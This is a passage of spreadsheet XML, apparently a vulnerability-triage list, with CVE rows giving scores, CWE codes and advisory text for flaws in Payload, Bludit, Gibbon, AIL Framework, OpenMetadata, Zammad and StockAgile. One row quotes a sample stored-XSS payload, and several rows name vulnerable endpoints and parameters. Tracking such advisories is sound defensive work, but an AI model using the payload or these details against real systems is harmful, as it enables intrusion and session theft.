      <c r="T365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92799</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93363</t>
        </is>
      </c>
      <c r="D366" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E366" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F366" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="inlineStr"/>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr"/>
      <c r="K366" s="5" t="inlineStr"/>
      <c r="L366" s="5" t="inlineStr"/>
      <c r="M366" s="5" t="inlineStr"/>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q366" s="5" t="inlineStr"/>
      <c r="R366" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S366" s="5" t="inlineStr">
        <is>
          <t>The @payloadcms/storage-vercel-blob storage adapter for Payload contains an improper access control vulnerability that allows authenticated users to bypass collection-level permissions by accessing the client-upload route directly. Attackers can upload files through the client-upload endpoint without possessing the required collection access permissions, circumventing the intended access control enforcement.</t>
        </is>
      </c>
      <c r="T366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93363</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93364</t>
        </is>
      </c>
      <c r="D367" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E367" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F367" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="inlineStr"/>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K367" s="5" t="inlineStr"/>
      <c r="L367" s="5" t="inlineStr"/>
      <c r="M367" s="5" t="inlineStr"/>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q367" s="5" t="inlineStr"/>
      <c r="R367" s="5" t="inlineStr">
        <is>
          <t>CWE-915</t>
        </is>
      </c>
      <c r="S367" s="5" t="inlineStr">
        <is>
          <t>Bludit CMS through 3.22.0 contains a mass assignment vulnerability that allows authenticated users with the Author role to modify privileged page fields reserved for administrators by injecting reserved parameters into a content save request. Attackers can submit reserved fields such as type and username through the Pages::edit() function in bl-kernel/pages.class.php, which iterates all fields declared in dbFields without per-field authorization, enabling an Author to convert pages to static site-wide navigation entries or transfer page ownership to arbitrary accounts.</t>
        </is>
      </c>
      <c r="T367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93364</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97864</t>
        </is>
      </c>
      <c r="D368" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E368" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="inlineStr"/>
      <c r="I368" s="5" t="inlineStr"/>
      <c r="J368" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K368" s="5" t="inlineStr"/>
      <c r="L368" s="5" t="inlineStr"/>
      <c r="M368" s="5" t="inlineStr"/>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P368" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q368" s="5" t="inlineStr"/>
      <c r="R368" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S368" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in GibbonEdu Gibbon up to 30.0.01. The affected element is the function makeBlock of the file modules/Planner/units_add_blockAjax.php of the component Unit Planner. The manipulation of the argument gibbonUnitBlockID/mode leads to missing authentication. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 31.0.00 is sufficient to fix this issue. The identifier of the patch is 07e719368eae8dfb4e22e19424ceab6074164ebc. It is recommended to upgrade the affected component.</t>
        </is>
      </c>
      <c r="T368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97864</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100174</t>
        </is>
      </c>
      <c r="D369" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E369" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F369" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="inlineStr"/>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K369" s="5" t="inlineStr"/>
      <c r="L369" s="5" t="inlineStr"/>
      <c r="M369" s="5" t="inlineStr"/>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q369" s="5" t="inlineStr"/>
      <c r="R369" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S369" s="5" t="inlineStr">
        <is>
          <t>The AIL Framework tag selector component (var/www/static/js/tags.js) is vulnerable to stored cross-site scripting (XSS). A user with the ability to create a custom tag could embed an HTML payload containing JavaScript event handlers (e.g., &lt;img src=x onerror=alert(1)&gt; or &lt;svg onload=...&gt;) in the tag name. When another authenticated user opened a page containing the tag selector, the malicious tag name was inserted into the DOM using jQuery's html property, causing the embedded script to execute in the victim's browser context.
The vulnerable code paths affected both the suggestion/combo-item rendering (_renderComboItems) and the selected-tag rendering logic. In both cases, the display value derived from the tag's displayField was passed directly to the html property of a jQuery element constructor, which parses and inserts the string as raw HTML rather than as text.
Preconditions: the attacker must have an authenticated account with permission to create custom tags, and the victim must be an authenticated user who views a page that renders the tag selector with the attacker's stored tag. The attack is stored (persistent) and does not require the victim to perform any action beyond loading the page.
Security impact: successful exploitation allows arbitrary JavaScript execution in the victim's browser within the application's origin, potentially leading to session hijacking, unauthorized data access, form manipulation, or further client-side attacks.</t>
        </is>
      </c>
      <c r="T369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100174</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100373</t>
        </is>
      </c>
      <c r="D370" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E370" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F370" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="inlineStr"/>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K370" s="5" t="inlineStr"/>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q370" s="5" t="inlineStr"/>
      <c r="R370" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S370" s="5" t="inlineStr">
        <is>
          <t>OpenMetadata through 2.0.2 contains a server-side request forgery vulnerability in the URLValidator.validateURL function that fails to properly resolve DNS hostnames and validate internal addresses. Users permitted to create or update EventSubscription can set webhook destinations to internal hosts, allowing the server to send requests to private networks and cloud metadata endpoints while returning HTTP status codes that enable blind SSRF probing.</t>
        </is>
      </c>
      <c r="T370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100373</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56726</t>
        </is>
      </c>
      <c r="D371" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E371" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F371" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="inlineStr"/>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr">
        <is>
          <t>github, gitlab</t>
        </is>
      </c>
      <c r="K371" s="5" t="inlineStr"/>
      <c r="L371" s="5" t="inlineStr"/>
      <c r="M371" s="5" t="inlineStr"/>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P371" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q371" s="5" t="inlineStr"/>
      <c r="R371" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S371" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, this vulnerability breaks normal ticket isolation boundaries between agents. Any authenticated agent, even one with no active tickets assigned to them, can view the titles, status, labels, and URL links of GitHub/GitLab issues attached to any ticket in the system. This allows an internal user to systematically view GitHub/GitLab issue data linked by other agents or administrators across the organization by simply querying random or sequential ticket IDs. This vulnerability is fixed in 7.0.2.</t>
        </is>
      </c>
      <c r="T371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56726</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6082</t>
        </is>
      </c>
      <c r="D372" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E372" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F372" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr"/>
      <c r="K372" s="5" t="inlineStr"/>
      <c r="L372" s="5" t="inlineStr"/>
      <c r="M372" s="5" t="inlineStr"/>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q372" s="5" t="inlineStr"/>
      <c r="R372" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S372" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) vulnerability in StockAgile API and management panel. The vulnerability is present on the server side in REST endpoint '/inventory/configuration/payment-methods' that allow the injection and persistence of malicious JavaScript code through parameters such as ‘code’, ‘name’, and other text fields. The scripts that are entered are not filtered or validated correctly before being displayed on the web panel that authenticated users can access. Exploiting this vulnerability could allow a remote, previously authenticated attacker to execute arbitrary JavaScript code.</t>
        </is>
      </c>
      <c r="T372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6082</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6083</t>
        </is>
      </c>
      <c r="D373" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E373" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F373" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr"/>
      <c r="K373" s="5" t="inlineStr"/>
      <c r="L373" s="5" t="inlineStr"/>
      <c r="M373" s="5" t="inlineStr"/>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P373" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q373" s="5" t="inlineStr"/>
      <c r="R373" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S373" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) vulnerability in StockAgile API and management panel. The vulnerability is present on the server side in REST endpoint '
/inventory/configuration/pricing-tiers' that allow the injection and persistence of malicious JavaScript code through parameters such as ‘code’, ‘name’, and other text fields. The scripts that are entered are not filtered or validated correctly before being displayed on the web panel that authenticated users can access. Exploiting this vulnerability could allow a remote, previously authenticated attacker to execute arbitrary JavaScript code.</t>
        </is>
      </c>
      <c r="T373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6083</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6084</t>
        </is>
      </c>
      <c r="D374" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E374" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F374" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr"/>
      <c r="K374" s="5" t="inlineStr"/>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q374" s="5" t="inlineStr"/>
      <c r="R374" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S374" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) vulnerability in StockAgile API and management panel. The vulnerability is present on the server side in REST endpoint '/inventory/configuration/variants' that allow the injection and persistence of malicious JavaScript code through parameters such as ‘code’, ‘name’, and other text fields. The scripts that are entered are not filtered or validated correctly before being displayed on the web panel that authenticated users can access. Exploiting this vulnerability could allow a remote, previously authenticated attacker to execute arbitrary JavaScript code.</t>
        </is>
      </c>
      <c r="T374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6084</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6085</t>
        </is>
      </c>
      <c r="D375" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E375" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F375" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr"/>
      <c r="K375" s="5" t="inlineStr"/>
      <c r="L375" s="5" t="inlineStr"/>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q375" s="5" t="inlineStr"/>
      <c r="R375" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S375" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) vulnerability in StockAgile API and management panel. The vulnerability is present on the server side in REST endpoint '/inventory/configuration/serial-number-types' that allow the injection and persistence of malicious JavaScript code through parameters such as ‘code’, ‘name’, and other text fields. The scripts that are entered are not filtered or validated correctly before being displayed on the web panel that authenticated users can access. Exploiting this vulnerability could allow a remote, previously authenticated attacker to execute arbitrary JavaScript code.</t>
        </is>
      </c>
      <c r="T375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6085</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6086</t>
        </is>
      </c>
      <c r="D376" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr"/>
      <c r="K376" s="5" t="inlineStr"/>
      <c r="L376" s="5" t="inlineStr"/>
      <c r="M376" s="5" t="inlineStr"/>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q376" s="5" t="inlineStr"/>
      <c r="R376" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S376" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) vulnerability in StockAgile API and management panel. The vulnerability is present on the server side in REST endpoint '/inventory/configuration/serial-number-types' that allow the injection and persistence of malicious JavaScript code through parameters such as ‘code’, ‘name’, and other text fields. The scripts that are entered are not filtered or validated correctly before being displayed on the web panel that authenticated users can access. Exploiting this vulnerability could allow a remote, previously authenticated attacker to execute arbitrary JavaScript code.</t>
        </is>
      </c>
      <c r="T376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6086</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6087</t>
        </is>
      </c>
      <c r="D377" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E377" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F377" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K377" s="5" t="inlineStr"/>
      <c r="L377" s="5" t="inlineStr"/>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q377" s="5" t="inlineStr"/>
      <c r="R377" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S377" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) vulnerability in StockAgile API and management panel. The vulnerability is present on the server side in REST endpoint '/inventory/configuration/categories' that allow the injection and persistence of malicious JavaScript code through parameters such as ‘code’, ‘name’, and other text fields. The scripts that are entered are not filtered or validated correctly before being displayed on the web panel that authenticated users can access. Exploiting this vulnerability could allow a remote, previously authenticated attacker to execute arbitrary JavaScript code.</t>
        </is>
      </c>
      <c r="T377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6087</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6088</t>
        </is>
      </c>
      <c r="D378" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E378" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F378" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K378" s="5" t="inlineStr"/>
      <c r="L378" s="5" t="inlineStr"/>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q378" s="5" t="inlineStr"/>
      <c r="R378" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S378" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) vulnerability in StockAgile API and management panel. The vulnerability is present on the server side in REST endpoint '/inventory/configuration/categories' that allow the injection and persistence of malicious JavaScript code through parameters such as ‘code’, ‘name’, and other text fields. The scripts that are entered are not filtered or validated correctly before being displayed on the web panel that authenticated users can access. Exploiting this vulnerability could allow a remote, previously authenticated attacker to execute arbitrary JavaScript code.</t>
        </is>
      </c>
      <c r="T378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6088</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63205</t>
        </is>
      </c>
      <c r="D379" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E379" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F379" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="inlineStr"/>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K379" s="5" t="inlineStr"/>
      <c r="L379" s="5" t="inlineStr"/>
      <c r="M379" s="5" t="inlineStr"/>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P379" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q379" s="5" t="inlineStr"/>
      <c r="R379" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="S379" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, when creating or updating an email signature, Zammad processes inline images referenced in the signature body. If a signature body contains an HTML img tag pointing to any existing attachment, the system copies that attachment into a new signature-owned record, without checking whether the user has permission to access the original attachment. The newly created copy is then downloadable by the same channel-admin user, because attachment access is determined by the copy's owner (the signature), not the original object (e.g., a ticket or knowledge-base article). This allows a user with any of the admin.channel_email, admin.channel_google, admin.channel_microsoft365, or admin.channel_microsoft_graph permissions to read attachments they would otherwise be denied access to, such as ticket attachments belonging to groups they are not a member of. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63205</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63208</t>
        </is>
      </c>
      <c r="D380" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E380" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F380" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="inlineStr"/>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr"/>
      <c r="K380" s="5" t="inlineStr"/>
      <c r="L380" s="5" t="inlineStr"/>
